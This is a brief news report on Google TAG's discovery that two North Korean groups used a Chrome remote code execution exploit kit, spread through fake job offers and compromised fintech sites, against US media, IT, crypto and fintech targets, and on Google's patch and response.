North Korean Hackers on Fray Against US Institutions

Google’s TAG said that it had discovered a pair of North Korean hacking group namely, Operation Dream Job and Operation AppleJeus last month that were leveraging a remote code execution exploit in the Chrome web browser.

Both hacking group reportedly targeted the US news media, IT, crypto and fintech industries, with evidence of their attacks going back as far as January 4th, 2022, but the TAG team notes that organizations outside the US could have been targets as well.

Google TAG team said both the groups uses the same exploit kit for a kind of different mission and destruction. This exploit kit has a possibility that it might be used by other government-backed attackers

Operation Dream Job targeted 250 people across 10 companies with fraudulent job offers from the likes of Disney and Oracle sent from accounts spoofed to look like they came from Indeed or ZipRecruiter. Clicking on the link would launch a hidden iframe that would trigger the exploit.

Operation AppleJeus, on the other hand targeted more than 85 users in the cryptocurrency and fintech industries using the same exploit kit. That effort involved compromising at least two legitimate fintech company websites and hosting hidden iframes to serve the exploit kit to visitors.

The exploit kit serves some heavily obfuscated javascript used to fingerprint the target system and collects all available client information, and then sent it back to the C&C server. If a set of unknown requirements were met, the client would be served a Chrome RCE exploit and some additional javascript. If the RCE was successful, the javascript would request the next stage referenced within the script as Sandbox Escape

This has been discovered on February 10th and had patched by February 14th. The company has added all identified websites and domains to its Safe Browsing database as well as notified all of the targeted Gmail and Workspace users about the attempts.